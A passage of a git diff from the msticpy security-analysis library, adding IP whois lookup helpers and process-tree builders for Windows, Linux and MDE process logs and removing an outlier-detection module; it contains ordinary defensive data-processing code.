+        if ipaddress.ip_address(ip_str).is_global:
+            return "Public"
+        if ipaddress.ip_address(ip_str).is_loopback:
+            return "Loopback"
+        if ipaddress.ip_address(ip_str).is_link_local:
+            return "Link Local"
+        if ipaddress.ip_address(ip_str).is_unspecified:
+            return "Unspecified"
+        if ipaddress.ip_address(ip_str).is_private:
+            return "Private"
+        if ipaddress.ip_address(ip_str).is_reserved:
+            return "Reserved"
+
+    return "Unspecified"
+
+
+# pylint: enable=too-many-return-statements
+
+
+# pylint: disable=invalid-name
+@lru_cache(maxsize=1024)
+def get_whois_info(
+    ip: str = None, show_progress: bool = False, **kwargs
+) -> Tuple[str, dict]:
+    """
+    Retrieve whois ASN information for given IP address using IPWhois python package.
+
+    Parameters
+    ----------
+    ip : str
+        IP Address to look up.
+    ip_str : str
+        alias for `ip`.
+    show_progress : bool, optional
+        Show progress for each query, by default False
+
+    Returns
+    -------
+    IP
+        Details of the IP data collected
+
+    Notes
+    -----
+    This function uses the Python functools lru_cache and
+    will return answers from the cache for previously queried
+    IP addresses.
+
+    """
+    ip_str = ip or kwargs.get("ip_str")
+    if not ip_str:
+        raise ValueError("'ip' or 'ip_str' value must be specified")
+    ip_type = get_ip_type(ip_str)
+    if ip_type == "Public":
+        try:
+            whois = IPWhois(ip_str)
+            whois_result = whois.lookup_whois()
+            if show_progress:
+                print(".", end="")
+            return whois_result["asn_description"], whois_result
+        except (
+            HTTPLookupError,
+            HTTPRateLimitError,
+            HostLookupError,
+            WhoisLookupError,
+            WhoisRateLimitError,
+            ASNRegistryError,
+        ) as err:
+            return f"Error during lookup of {ip_str} {type(err)}", {}
+    return f"No ASN Information for IP type: {ip_type}", {}
+
+
+# pylint: enable=invalid-name
+
+
+def get_whois_df(
+    data: pd.DataFrame,
+    ip_column: str,
+    all_columns: bool = False,
+    asn_col: str = "AsnDescription",
+    whois_col: Optional[str] = None,
+    show_progress: bool = False,
+) -> pd.DataFrame:
+    """
+    Retrieve Whois ASN information for DataFrame of IP Addresses.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        Input DataFrame
+    ip_column : str
+        Column name of IP Address to look up.
+    all_columns:
+        Expand all whois data to columns.
+    asn_col : str, optional
+        Name of the output column for ASN description,
+        by default "ASNDescription".
+        Ignored if `all_columns` is True.
+    whois_col : str, optional
+        Name of the output column for full whois data,
+        by default "WhoIsData"
+        Ignored if `all_columns` is True.
+    show_progress : bool, optional
+        Show progress for each query, by default False
+
+    Returns
+    -------
+    pd.DataFrame
+        Output DataFrame with results in added columns.
+
+    """
+    if all_columns:
+        return data.apply(
+            lambda x: get_whois_info(x[ip_column], show_progress=show_progress)[1],
+            axis=1,
+            result_type="expand",
+        )
+    data = data.copy()
+    if whois_col is not None:
+        data[[asn_col, whois_col]] = data.apply(
+            lambda x: get_whois_info(x[ip_column], show_progress=show_progress),
+            axis=1,
+            result_type="expand",
+        )
+    else:
+        data[asn_col] = data.apply(
+            lambda x: get_whois_info(x[ip_column], show_progress=show_progress)[0],
+            axis=1,
+        )
+    return data
+
+
+# pylint: disable=too-few-public-methods
+@pd.api.extensions.register_dataframe_accessor("mp_whois")
+class IpWhoisAccessor:
+    """Pandas api extension for IP Whois lookup."""
+
+    def __init__(self, pandas_obj):
+        """Instantiate pandas extension class."""
+        self._df = pandas_obj
+
+    def lookup(self, ip_column, **kwargs):
+        """
+        Extract IoCs from either a pandas DataFrame.
+
+        Parameters
+        ----------
+        ip_column : str
+            Column name of IP Address to look up.
+
+        Other Parameters
+        ----------------
+        asn_col : str, optional
+            Name of the output column for ASN description,
+            by default "ASNDescription"
+        whois_col : str, optional
+            Name of the output column for full whois data,
+            by default "WhoIsData"
+        show_progress : bool, optional
+            Show progress for each query, by default False
+
+        Returns
+        -------
+        pd.DataFrame
+            Output DataFrame with results in added columns.
+
+        """
+        return get_whois_df(data=self._df, ip_column=ip_column, **kwargs)
+
+
+@deprecated("Will be removed in a future version", version="1.4.0")
+def create_ip_record(
+    heartbeat_df: pd.DataFrame, az_net_df: pd.DataFrame = None
+) -> IpAddress:
+    """
+    Generate ip_entity record for provided IP value.
+
+    Parameters
+    ----------
+    heartbeat_df : pd.DataFrame
+        A dataframe of heartbeat data for the host
+    az_net_df : pd.DataFrame
+        Option dataframe of Azure network data for the host
+
+    Returns
+    -------
+    IP
+        Details of the IP data collected
+
+    """
+    ip_entity = IpAddress()
+
+    # Produce ip_entity record using available dataframes
+    ip_hb = heartbeat_df.iloc[0]
+    ip_entity.Address = ip_hb["ComputerIP"]
+    ip_entity.hostname = ip_hb["Computer"]  # type: ignore
+    ip_entity.SourceComputerId = ip_hb["SourceComputerId"]  # type: ignore
+    ip_entity.OSType = ip_hb["OSType"]  # type: ignore
+    ip_entity.OSName = ip_hb["OSName"]  # type: ignore
+    ip_entity.OSVMajorersion = ip_hb["OSMajorVersion"]  # type: ignore
+    ip_entity.OSVMinorVersion = ip_hb["OSMinorVersion"]  # type: ignore
+    ip_entity.ComputerEnvironment = ip_hb["ComputerEnvironment"]  # type: ignore
+    ip_entity.OmsSolutions = [  # type: ignore
+        sol.strip() for sol in ip_hb["Solutions"].split(",")
+    ]
+    ip_entity.VMUUID = ip_hb["VMUUID"]  # type: ignore
+    ip_entity.SubscriptionId = ip_hb["SubscriptionId"]  # type: ignore
+    geoloc_entity = GeoLocation()  # type: ignore
+    geoloc_entity.CountryName = ip_hb["RemoteIPCountry"]  # type: ignore
+    geoloc_entity.Longitude = ip_hb["RemoteIPLongitude"]  # type: ignore
+    geoloc_entity.Latitude = ip_hb["RemoteIPLatitude"]  # type: ignore
+    ip_entity.Location = geoloc_entity  # type: ignore
+
+    # If Azure network data present add this to host record
+    if az_net_df is not None and not az_net_df.empty:
+        if len(az_net_df) == 1:
+            priv_addr_str = az_net_df["PrivateIPAddresses"].loc[0]
+            ip_entity["private_ips"] = convert_to_ip_entities(priv_addr_str)
+            pub_addr_str = az_net_df["PublicIPAddresses"].loc[0]
+            ip_entity["public_ips"] = convert_to_ip_entities(pub_addr_str)
+        else:
+            if "private_ips" not in ip_entity:
+                ip_entity["private_ips"] = []
+            if "public_ips" not in ip_entity:
+                ip_entity["public_ips"] = []
+
+    return ip_entity
diff --git a/msticpy/sectools/outliers.py b/msticpy/sectools/outliers.py
deleted file mode 100644
index a5d7ec383..000000000
--- a/msticpy/sectools/outliers.py
+++ /dev/null
@@ -1,119 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""Outlier detection class. TODO **Preliminary**."""
-
-import math
-
-import pandas as pd
-import numpy as np
-import matplotlib.pyplot as plt
-from sklearn.ensemble import IsolationForest
-
-from .. _version import VERSION
-
-__version__ = VERSION
-__author__ = 'Ian Hellen'
-
-# pylint: disable=all
-# noqa
-
-
-def identify_outliers(X: np.array, X_predict: np.Array = None, contamination: float = 0.05):
-    """
-    Identify outlier items using SkLearn IsolationForest.
-
-    Arguments:
-        X {[np.array]} -- Input data
-
-    Keyword Arguments:
-        X_predict {[np.array]} -- Model (default: {None})
-        contamination {float} -- Percentage contamination (default: {0.05})
-    """
-    rng = np.random.RandomState(42)
-
-    # fit the model
-    rows, cols = X.shape
-    max_samples = min(100, cols)
-    max_features = math.floor(math.sqrt(rows))
-    clf = IsolationForest(max_samples=max_samples, max_features=max_features,
-                          random_state=rng, contamination=contamination)
-    clf.fit(X)
-    y_pred_train = clf.predict(X)
-
-    y_pred_outliers = clf.predict(X_predict)
-
-    X_outliers = X_predict[y_pred_outliers == -1]
-    return clf, X_outliers, y_pred_outliers
-
-
-def plot_outlier_results(clf: IsolationForest, X: np.array,
-                         X_predict: np.array, X_outliers: np.array,
-                         feature_columns: list({int}), plt_title: str):
-    """
-    Plot Isolation Forest results.
-
-    Arguments:
-        clf {IsolationForest} -- Isolation Forest model
-        X {np.array} -- Input data
-        X_predict {np.array} -- Prediction
-        X_outliers {np.array} -- Set of outliers
-        feature_columns {list} -- list of feature columns to display
-        plt_title {str} -- Title
-    """
-    # plot the line, the samples, and the nearest vectors to the plane
-    x_max_x = X[:, 0].max() + (X[:, 0].max() / 10)
-    x_min_x = - X[:, 0].max() / 10
-    x_max_y = X[:, 1].max() + (X[:, 1].max() / 10)
-    x_min_y = - X[:, 1].max() / 10
-    xx, yy = np.meshgrid(np.linspace(x_min_x, x_max_x, 100),
-                         np.linspace(x_min_y, x_max_y, 100))
-    Z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()])
-    Z = Z.reshape(xx.shape)
-
-    plt.rcParams['figure.figsize'] = (20, 10)
-
-    plt.title(plt_title)
-    plt.contourf(xx, yy, Z, cmap=plt.cm.Blues_r)
-
-    b1 = plt.scatter(X[:, 0], X[:, 1], c='white',
-                     s=20, edgecolor='k')
-    b2 = plt.scatter(X_predict[:, 0], X_predict[:, 1], c='green',
-                     s=40, edgecolor='k')
-    c = plt.scatter(X_outliers[:, 0], X_outliers[:, 1], c='red', marker='x',
-                    s=200, edgecolor='k')
-    plt.axis('tight')
-
-    xp_max_x = X_predict[:, 0].max() + (X_predict[:, 0].max() / 10)
-    xp_min_x = - X_predict[:, 0].max() / 10
-    xp_max_y = X_predict[:, 1].max() + (X_predict[:, 1].max() / 10)
-    xp_min_y = - X_predict[:, 1].max() / 10
-
-    plt.xlim((xp_min_x, xp_max_x))
-    plt.ylim((xp_min_y, xp_max_y))
-    plt.xlabel(feature_columns[0])
-    plt.ylabel(feature_columns[1])
-
-    plt.legend([b1, b2, c],
-               ["training observations",
-                "new regular observations", "new abnormal observations"],
-               loc="upper right")
-    plt.show()
-
-
-def remove_common_items(data: pd.DataFrame, columns: list):
-    """
-    Remove rows from input DataFrame.
-
-    Arguments:
-        data {pd.DataFrame} -- [description]
-        columns {list} -- [description]
-    """
-    filtered_df = data
-    for col in columns:
-        filtered_df = filtered_df.filter(lambda x: (x[col].std() == 0 and
-                                                    x[col].count() > 10))
-
-    return filtered_df
diff --git a/msticpy/sectools/proc_tree_build_mde.py b/msticpy/sectools/proc_tree_build_mde.py
new file mode 100644
index 000000000..a0e2c2862
--- /dev/null
+++ b/msticpy/sectools/proc_tree_build_mde.py
@@ -0,0 +1,364 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Process tree builder routines for MDE process data."""
+from typing import Dict, Tuple, Union
+
+import numpy as np
+import pandas as pd
+
+from .._version import VERSION
+from ..data.query_defns import ensure_df_datetimes
+from .proc_tree_schema import ProcSchema
+from .proc_tree_schema import ColNames as Col
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_MDE_NON_STD_COL_MAP = {
+    "InitiatingProcessImageCreationTimeUtc": "CreatedProcessFileCreationTime",
+    "InitiatingProcessImageMd5": "CreatedProcessFileMd5",
+    "InitiatingProcessImageFilePath": "CreatedProcessFilePath",
+    "InitiatingProcessImageSha1": "CreatedProcessFileSha1",
+    "InitiatingProcessImageSha256": "CreatedProcessFileSha256",
+    "InitiatingProcessImageFileSizeInBytes": "CreatedProcessFileSize",
+    "InitiatingProcessParentProcessId": "CreatedProcessParentId",
+    "InitiatingProcessParentProcessName": "CreatedProcessParentName",
+    "InitiatingProcessParentCreationTime": "CreatedProcessParentCreationTimeUtc",
+}
+
+_MDE_TIMESTAMP_COLS = [
+    "CreatedProcessCreationTime",
+    "InitiatingProcessCreationTime",
+    "CreatedProcessParentCreationTimeUtc",
+    "InitiatingProcessParentCreationTime",
+]
+
+TS_FMT_STRING = "%Y-%m-%d %H:%M:%S.%f"
+
+
+def extract_process_tree(data: pd.DataFrame, debug: bool = False) -> pd.DataFrame:
+    """
+    Build a process tree from raw MDE process logs.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        DataFrame of process events.
+    debug: bool, optional
+        Turn on additional debugging output, by default False.
+
+    Returns
+    -------
+    pd.DataFrame
+        Process tree DataFrame with child->parent keys and
+        extracted parent processes from child data.
+
+    """
+    data = ensure_df_datetimes(data, columns=_MDE_TIMESTAMP_COLS)
+    par_child_col_map = _get_par_child_col_mapping(data)
+    inferred_parents = _extract_missing_parents(data, par_child_col_map, debug=debug)
+    missing_par_uniq = _get_unique_parents(inferred_parents, debug)
+    all_proc_par = pd.concat([data, missing_par_uniq], ignore_index=True)
+    missing_gps = _extract_missing_gparents(all_proc_par)
+    return pd.concat([all_proc_par, missing_gps], ignore_index=True, axis=0)
+
+
+def _sort_df_by_time(data, column="CreatedProcessCreationTime"):
+    """Return dataframe sorted by specified column and reset index."""
+    return data.sort_values(column, ascending=True).reset_index().drop(columns="index")
+
+
+def _add_proc_key(
+    data: pd.DataFrame,
+    key_name: str,
+    proc_name_col: str,
+    proc_id_col: str,
+    timestamp_col: str,
+):
+    """
+    Add process/parent key to data.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        Input data
+    key_name : str
+        The name of the key to create
+    proc_name_col : str
+        Process name column
+    proc_id_col : str
+        Process ID column
+    timestamp_col : str
+        Process time stamp column.
+
+    Notes
+    -----
+    This function adds the key column to the passed `data` dataframe.
+
+    """
+    data[key_name] = (
+        data[proc_name_col].str.lower()
+        + "|"
+        + data[proc_id_col].astype(str).str.lower()
+        + "|"
+        + data[timestamp_col].dt.round("10us").dt.strftime(TS_FMT_STRING)
+    )
+
+
+def _extract_missing_parents(
+    data: pd.DataFrame, col_mapping: Dict[str, str], debug: bool = False
+) -> pd.DataFrame:
+    """Return parent processes that are not in the created process set."""
+    # save the source index
+    data["src_index"] = data.index
+    # add process key
+    _add_proc_key(
+        data,
+        Col.proc_key,
+        "CreatedProcessName",
+        "CreatedProcessId",
+        "CreatedProcessCreationTime",
+    )
+
+    # Create full process file path for initiating processes
+    data["InitiatingProcessFileName"] = (
+        data.InitiatingProcessImageFilePath + "\\" + data.InitiatingProcessName
+    )
+    # Create parent key
+    _add_proc_key(
+        data,
+        Col.parent_key,
+        "InitiatingProcessName",
+        "InitiatingProcessId",
+        "InitiatingProcessCreationTime",
+    )
+
+    # Separate the InitiatingProcess columns from the DF
+    parent_cols = set(data.filter(regex="Initiating.*").columns)
+    non_par_cols = set(data.columns) - parent_cols
+    non_par_cols.remove("src_index")
+    # print(non_par_cols)
+
+    # merge the original data with the parent rows
+    merged_parents = data.filter(
+        regex="Initiating.*|parent_key|src_index"
+    ).merge(  # parents
+        data.filter(non_par_cols),  # created_procs
+        left_on=Col.parent_key,
+        right_on=Col.proc_key,
+        suffixes=("_child", "_par"),
+        how="left",
+    )
+
+    # Any NA results from the merge indicate that the parent process
+    # is not itself in the list of processes
+    missing_parents = merged_parents[merged_parents["CreatedProcessParentId"].isna()]
+    missing_parents = (
+        missing_parents.dropna(axis=1, how="all")
+        .rename(columns=col_mapping)
+        .rename(columns={"parent_key_child": Col.proc_key})
+        .drop(columns=["InitiatingProcessFileName"])
+    )
+    missing_parents["CreatedProcessFilePath"] = (
+        missing_parents.CreatedProcessFilePath
+        + "\\"
+        + missing_parents.CreatedProcessName
+    )
+    missing_parents = _sort_df_by_time(missing_parents)
+    if debug:
+        print("missing parent procs", len(missing_parents))
+        # All successful merges indicate that the parent IS in the list of processes
+        found_parents = merged_parents[~merged_parents["CreatedProcessParentId"].isna()]
+        print("existing parent procs", len(found_parents))
+        mpar_uniq_test = (
+            missing_parents.drop(columns="src_index").groupby(Col.proc_key).nunique()
+        )
+        if not mpar_uniq_test[mpar_uniq_test > 1].dropna(how="all").empty:
+            print("Error - some extracted parents have duplicate keys")
+            print(mpar_uniq_test[mpar_uniq_test > 1].dropna(how="all"))
+    return missing_parents
+
+
+# Get unique parents and add the parent key
+def _get_unique_parents(data, debug=False):
+    """Return unique set of processes."""
+    if "src_index" in data.columns:
+        data = data.drop(columns="src_index")
+    missing_par_uniq = data.drop_duplicates().copy()
+    missing_par_uniq["InitiatingProcessName"] = missing_par_uniq.apply(
+        lambda row: row.CreatedProcessParentName.split("\\")[-1], axis=1
+    )
+    if debug:
+        print("unique:", missing_par_uniq.shape, "original:", data.shape)
+    _add_proc_key(
+        missing_par_uniq,
+        Col.parent_key,
+        "InitiatingProcessName",
+        "CreatedProcessParentId",
+        "CreatedProcessParentCreationTimeUtc",
+    )
+    return missing_par_uniq
+
+
+def _split_file_path(
+    input_path: str,
+    path_col: str = "CreatedProcessFilePath",
+    file_col: str = "CreatedProcessName",
+    separator: str = "\\",
+) -> Dict[str, Union[str, float]]:
+    """Split file path in to folder/stem."""
+    f_path: Union[str, float] = np.nan
+    f_stem: Union[str, float] = np.nan
+    try:
+        f_path, _, f_stem = input_path.rpartition(separator)
+    except AttributeError:
+        pass
+    return {path_col: f_path, file_col: f_stem}
+
+
+def _extract_missing_gparents(data):
+    """Return grandparent processes for any procs not in Createdprocesses."""
+    missing_gps = (
+        data[~data.parent_key.isin(data.proc_key)]
+        .filter(regex=".*Parent.*")
+        .drop_duplicates()
+    )
+    missing_gps_file_split = missing_gps.apply(
+        lambda proc: _split_file_path(proc.CreatedProcessParentName),
+        axis=1,
+        result_type="expand",
+    )
+    missing_gps = (
+        missing_gps.join(missing_gps_file_split)
+        .drop(
+            columns=[
+                "InitiatingProcessParentCreationTime",
+                "InitiatingProcessParentProcessId",
+                "InitiatingProcessParentProcessName",
+                "CreatedProcessFilePath",
+            ]
+        )
+        .rename(
+            columns={
+                "CreatedProcessParentCreationTimeUtc": "CreatedProcessCreationTime",
+                "CreatedProcessParentName": "CreatedProcessFilePath",
+                "CreatedProcessParentId": "CreatedProcessId",
+            }
+        )
+    )
+    _add_proc_key(
+        missing_gps,
+        Col.proc_key,
+        "CreatedProcessName",
+        "CreatedProcessId",
+        "CreatedProcessCreationTime",
+    )
+    return missing_gps
+
+
+def _get_par_child_col_mapping(data: pd.DataFrame) -> Dict[str, str]:
+    """Return a mapping between parent and child column names."""
+    created_proc_cols = _remove_col_prefix(data, "Created")
+    init_proc_cols = _remove_col_prefix(data, "Initiating")
+    init_proc_col_mapping, _ = _map_columns(created_proc_cols, init_proc_cols)
+    return {**init_proc_col_mapping, **_MDE_NON_STD_COL_MAP}
+
+
+def _remove_col_prefix(data: pd.DataFrame, prefix: str) -> Dict[str, str]:
+    """Return a mapping of column stems and columns with `prefix`."""
+    return {
+        col.replace(prefix, ""): col for col in data.columns if col.startswith(prefix)
+    }
+
+
+def _map_columns(
+    created_cols: Dict[str, str], init_cols: Dict[str, str]
+) -> Tuple[Dict[str, str], Dict[str, str]]:
+    """Return Initiating -> Created column mapping."""
+    col_mapping = {}
+    unmapped = {}
+    for col_stem, col in init_cols.items():
+        if col_stem in created_cols:
+            col_mapping[col] = created_cols[col_stem]
+        else:
+            unmapped[col_stem] = col
+    return col_mapping, unmapped
+
+
+_SENTINEL_MDE_MAP = {
+    "AccountDomain": "CreatedProcessAccountDomainName",
+    "AccountName": "CreatedProcessAccountName",
+    "AccountSid": "CreatedProcessAccountSid",
+    "DeviceId": "MachineId",
+    "DeviceName": "ComputerDnsName",
+    "FileName": "CreatedProcessName",
+    "FolderPath": "CreatedProcessFilePath",
+    "InitiatingProcessAccountDomain": "InitiatingProcessAccountDomainName",
+    "InitiatingProcessCommandLine": "Process_CommandLine",
+    "InitiatingProcessFileName": "InitiatingProcessName",
+    "InitiatingProcessFolderPath": "InitiatingProcessImageFilePath",
+    "InitiatingProcessMD5": "InitiatingProcessImageMd5",
+    "InitiatingProcessParentFileName": "InitiatingProcessParentProcessName",
+    "InitiatingProcessParentId": "InitiatingProcessParentProcessId",
+    "InitiatingProcessSHA1": "InitiatingProcessImageSha1",
+    "InitiatingProcessSHA256": "InitiatingProcessImageSha256",
+    "InitiatingProcessTokenElevation": "InitiatingProcessTokenElevationType",
+    "MD5": "CreatedProcessFileMd5",
+    "ProcessCommandLine": "CreatedProcessCommandLine",
+    "ProcessCreationTime": "CreatedProcessCreationTime",
+    "ProcessId": "CreatedProcessId",
+    "ProcessIntegrityLevel": "CreatedProcessIntegrityLevel",
+    "ProcessTokenElevation": "CreatedProcessTokenElevationType",
+    "SHA1": "CreatedProcessFileSha1",
+    "SHA256": "CreatedProcessFileSha256",
+}
+
+_UNK_TIME = pd.Timestamp("1970-01-01", tz="UTC")
+
+
+def convert_mde_schema_to_internal(
+    data: pd.DataFrame, schema: ProcSchema
+) -> pd.DataFrame:
+    """
+    Convert DeviceProcessEvents schema data to internal MDE schema.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        Input data in MS Sentinel schema.
+    schema : ProcSchema
+        The mapping schema for the data set.
+
+    Returns
+    -------
+    pd.DataFrame
+        Reformatted data into MDE internal schema.
+
+    """
+    # Fill in missing timestamps with placeholder
+    data["ProcessCreationTime"] = data[schema.time_stamp].fillna(_UNK_TIME)
+    data["InitiatingProcessCreationTime"] = data.InitiatingProcessCreationTime.fillna(
+        _UNK_TIME
+    )
+    data[
+        "InitiatingProcessParentCreationTime"
+    ] = data.InitiatingProcessParentCreationTime.fillna(_UNK_TIME)
+
+    # Proc tree code references CreateProcessParentId
+    # This should be the same as InitiatingProcessParentId
+    data["CreatedProcessParentId"] = data[schema.parent_id]
+
+    # Put a value in parent procs with no name
+    null_proc_parent = data[schema.parent_name] == ""
+    data.loc[null_proc_parent, schema.parent_name] = "unknown"
+
+    # Extract InitiatingProc folder path - remove stem
+    data["InitiatingProcessFolderPath"] = data.InitiatingProcessFolderPath.apply(
+        lambda x: x.rsplit("\\", maxsplit=1)[0]
+    )
+
+    return data.rename(columns=_SENTINEL_MDE_MAP)
diff --git a/msticpy/sectools/proc_tree_build_winlx.py b/msticpy/sectools/proc_tree_build_winlx.py
new file mode 100644
index 000000000..734260778
--- /dev/null
+++ b/msticpy/sectools/proc_tree_build_winlx.py
@@ -0,0 +1,340 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Process Tree builder for Windows security and Linux auditd events."""
+import attr
+import pandas as pd
+
+from .._version import VERSION
+from ..data.query_defns import ensure_df_datetimes
+from .proc_tree_schema import ColNames as Col
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+TS_FMT_STRING = "%Y-%m-%d %H:%M:%S.%f"
+
+
+def extract_process_tree(
+    procs: pd.DataFrame,
+    schema: "ProcSchema",  # type: ignore  # noqa: F821
+    debug: bool = False,
+) -> pd.DataFrame:
+    """
+    Build process trees from the process events.
+
+    Parameters
+    ----------
+    procs : pd.DataFrame
+        Process events (Windows 4688 or Linux Auditd)
+    schema : Union[ProcSchema, Dict[str, Any]], optional
+        The column schema to use, by default None.
+        If supplied as a dict it must include definitions for the
+        required fields in the ProcSchema class
+        If None, then the schema is inferred
+    debug : bool
+        If True produces extra debugging output,
+        by default False
+
+    Returns
+    -------
+    pd.DataFrame
+        Process tree dataframe.
+
+    See Also
+    --------
+    ProcSchema
+
+    """
+    # Clean data
+    procs_cln = _clean_proc_data(procs, schema)
+
+    # Merge parent-child
+    merged_procs = _merge_parent_by_time(procs_cln, schema)
+    if debug:
+        _check_merge_status(procs_cln, merged_procs, schema)
+
+    # extract inferred parents
+    merged_procs_par = _extract_inferred_parents(merged_procs, schema)
+    if debug:
+        _check_inferred_parents(merged_procs, merged_procs_par)
+
+    # Create Process and parent Keys
+    _assign_proc_key(
+        merged_procs_par,
+        Col.proc_key,
+        Col.new_process_lc,
+        schema.process_id,
+        schema.time_stamp,
+    )
+    _assign_proc_key(
+        merged_procs_par,
+        Col.parent_key,
+        Col.parent_proc_lc,
+        schema.parent_id,
+        Col.timestamp_orig_par,
+    )
+    return merged_procs_par
+
+
+def _clean_proc_data(
+    procs: pd.DataFrame,
+    schema: "ProcSchema",  # type: ignore  # noqa: F821
+) -> pd.DataFrame:
+    """Return cleaned process data."""
+    procs = ensure_df_datetimes(procs, columns=schema.time_stamp)
+    procs_cln = (
+        procs.drop_duplicates().sort_values(schema.time_stamp, ascending=True).copy()
+    )
+
+    # Filter out any non-process events
+    if schema.event_id_column and schema.event_id_identifier:
+        event_type_filter = procs_cln[schema.event_type_col] == schema.event_filter
+        procs_cln = procs_cln[event_type_filter]
+    # Convert any numeric schema cols to str types
+    procs_cln = _num_cols_to_str(procs_cln, schema)
+
+    procs_cln[Col.EffectiveLogonId] = procs_cln[schema.logon_id]
+    # Create effective logon Id for Windows, if the TargetLogonId is not 0x0
+    if schema.target_logon_id:
+        has_tgt_logonid = (procs_cln[schema.target_logon_id] != "0x0") & (
+            procs_cln[schema.target_logon_id].notna()
+        )
+        procs_cln.loc[has_tgt_logonid, Col.EffectiveLogonId] = procs_cln[
+            schema.target_logon_id
+        ]
+    procs_cln[Col.new_process_lc] = procs_cln[schema.process_name].str.lower()
+    if schema.parent_name:
+        no_pproc = procs_cln[schema.parent_name] == ""
+        procs_cln.loc[no_pproc, schema.parent_name] = "unknown"
+        procs_cln[Col.parent_proc_lc] = procs_cln[schema.parent_name].str.lower()
+    procs_cln[Col.source_index] = procs_cln.index
+    return procs_cln
+
+
+def _num_cols_to_str(
+    procs_cln: pd.DataFrame,
+    schema: "ProcSchema",  # type: ignore  # noqa: F821
+) -> pd.DataFrame:
+    """
+    Change any numeric columns in our core schema to strings.
+
+    Some columns like PID arrive as float or int types.
+    We need to convert the floats to ints (since we want to get rid of the ".0")
+    and then convert the int columns to str. We need to do this since
+    we build parent/child keys by concatenating some of these value
+    into a single string.
+    """
+    # Change float/int cols in our core schema to force int
+    schema_cols = [
+        col for col in attr.asdict(schema).values() if col and col in procs_cln.columns
+    ]
+    force_int_cols = {
+        col: "int"
+        for col, col_type in procs_cln[schema_cols].dtypes.to_dict().items()
+        if pd.api.types.is_float_dtype(col_type)
+    }
+    procs_cln = procs_cln.astype(force_int_cols)
+    # then change any int types in to string types
+    # note: we need the prev
+    int_to_str_cols = {
+        col: "str"
+        for col, col_type in procs_cln[schema_cols].dtypes.to_dict().items()
+        if pd.api.types.is_integer_dtype(col_type)
+    }
+    return procs_cln.astype(int_to_str_cols)
+
+
+def _merge_parent_by_time(
+    procs: pd.DataFrame,
+    schema: "ProcSchema",  # type: ignore  # noqa: F821
+) -> pd.DataFrame:
+    """Merge procs with parents using merge_asof."""
+    parent_procs = (
+        procs[
+            [
+                schema.process_id,
+                Col.EffectiveLogonId,
+                Col.new_process_lc,
+                Col.source_index,
+                schema.parent_id,
+                schema.time_stamp,
+                schema.process_name,
+            ]
+        ]
+        .assign(timestamp_orig_par=procs[schema.time_stamp])
+        .sort_values(schema.time_stamp, ascending=True)
+    )
+    # if we have a parent name (Windows) - use that as part of the
+    # match
+    if schema.parent_name:
+        par_join_cols = [schema.process_id, Col.new_process_lc]
+        child_join_cols = [schema.parent_id, Col.parent_proc_lc]
+    else:
+        par_join_cols = [schema.process_id]
+        child_join_cols = [schema.parent_id]
+    # merge_asof merges on the "by" fields and then the closest time
+    # match in the time_stamp field. The default is to look backwards
+    # for a match on the right of the join (parent) that is a time earlier
+    # than the corresponding row on the left.
+    return pd.merge_asof(
+        left=procs.sort_values(schema.time_stamp, ascending=True),
+        right=parent_procs,
+        on=schema.time_stamp,
+        left_by=child_join_cols,
+        right_by=par_join_cols,
+        suffixes=("", "_par"),
+    )
+
+
+def _extract_inferred_parents(
+    merged_procs: pd.DataFrame, schema: "ProcSchema"  # type: ignore  # noqa: F821
+) -> pd.DataFrame:
+    """Find any inferred parents and creates rows for them."""
+    tz_aware = merged_procs.iloc[0][schema.time_stamp].tz
+    time_zero = pd.Timestamp(0) if tz_aware is None else pd.Timestamp(0, tz=0)
+
+    # Fill in missing values for root processes
+    root_procs_crit = merged_procs[Col.source_index_par].isna()
+    merged_procs.loc[root_procs_crit, "NewProcessId_par"] = merged_procs[
+        schema.parent_id
+    ]
+    parent_col_name = schema.parent_name or "ParentName"
+    if schema.parent_name:
+        merged_procs.loc[root_procs_crit, Col.new_process_lc_par] = merged_procs[
+            Col.parent_proc_lc
+        ]
+    else:
+        merged_procs.loc[root_procs_crit, Col.new_process_lc_par] = "unknown"
+        merged_procs.loc[root_procs_crit, f"{schema.process_name}_par"] = "unknown"
+        # If the schema doesn't have a ParentProcessName/parent_proc_lc - copy this value
+        # from the merged data for ALL processes
+        merged_procs[parent_col_name] = merged_procs[f"{schema.process_name}_par"]
+        merged_procs[Col.parent_proc_lc] = merged_procs[Col.new_process_lc_par]
+    merged_procs.loc[root_procs_crit, Col.EffectiveLogonId_par] = merged_procs[
+        schema.logon_id
+    ]
+    merged_procs.loc[root_procs_crit, Col.timestamp_orig_par] = time_zero
+
+    # Extract synthentic rows for the parents of root processes
+    parent_cols = [
+        schema.host_name_column,
+        schema.parent_id,
+        Col.EffectiveLogonId_par,
+        parent_col_name,
+        Col.parent_proc_lc,
+    ]
+    if schema.event_id_column:
+        parent_cols.append(schema.event_id_column)
+    inferred_parents = (
+        merged_procs[root_procs_crit][parent_cols]
+        .rename(
+            columns={
+                schema.parent_id: schema.process_id,
+                schema.parent_name: schema.process_name,
+                Col.parent_proc_lc: Col.new_process_lc,
+                Col.EffectiveLogonId_par: schema.logon_id,
+            }
+        )
+        .assign(time_stamp=time_zero, EffectiveLogonId=merged_procs[schema.logon_id])
+        .rename(columns={"time_stamp": schema.time_stamp})
+        .drop_duplicates()
+    )
+
+    return pd.concat(
+        [merged_procs, inferred_parents], ignore_index=True, axis=0, sort=False
+    )
+
+
+def _assign_proc_key(
+    proc_data: pd.DataFrame,
+    key_name: str,
+    proc_name_col: str,
+    proc_id_col: str,
+    timestamp_col: str,
+):
+    """Create process and parent keys for unambiguous par-child relation."""
+    proc_data[key_name] = (
+        proc_data[proc_name_col]
+        + "|"
